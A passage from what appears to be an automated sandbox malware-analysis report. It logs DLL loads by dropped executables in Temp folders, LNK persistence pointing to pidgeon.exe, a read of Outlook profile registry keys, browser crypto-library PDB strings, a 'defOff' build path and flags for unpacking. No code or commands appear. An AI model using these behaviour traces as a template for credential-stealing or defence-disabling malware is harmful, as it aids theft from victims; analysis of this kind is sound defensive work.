                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeSection loaded: webio.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: webio.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: d3d9.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: dwmapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: wtsapi32.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: winsta.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: powrprof.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: umpdc.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: scrrun.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: webio.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeSection loaded: winmm.dll
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                    Source: tyds.lnk.13.drLNK file: ..\..\..\..\..\..\Local\Temp\1005552001\pidgeon.exe
                    Source: fvgp.lnk.26.drLNK file: ..\..\..\..\..\..\Local\Temp\1005552001\pidgeon.exe
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                    Source: file.exeStatic file information: File size 1802752 > 1048576
                    Source: file.exeStatic PE information: Raw size of gcuyxxju is bigger than: 0x100000 < 0x19e600
                    Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1981502028.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp
                    Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr
                    Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr
                    Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr
                    Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: c2bb02869b.exe, 0000001D.00000003.2654071952.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, c2bb02869b.exe, 0000001D.00000002.2787368146.0000000000792000.00000040.00000001.01000000.00000016.sdmp, c2bb02869b.exe, 00000020.00000003.2874392066.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, c2bb02869b.exe, 00000020.00000002.2914600460.0000000000792000.00000040.00000001.01000000.00000016.sdmp
                    Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1981502028.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp
                    Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.b50000.0.unpack :EW;.rsrc :W;.idata :W; :EW;gcuyxxju:EW;busnlrvl:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;gcuyxxju:EW;busnlrvl:EW;.taggant:EW;
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeUnpacked PE file: 9.2.DocumentsDGHCBAAEHC.exe.240000.0.unpack :EW;.rsrc:W;.idata :W;abdubcdx:EW;ajsqmvlu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;abdubcdx:EW;ajsqmvlu:EW;.taggant:EW;
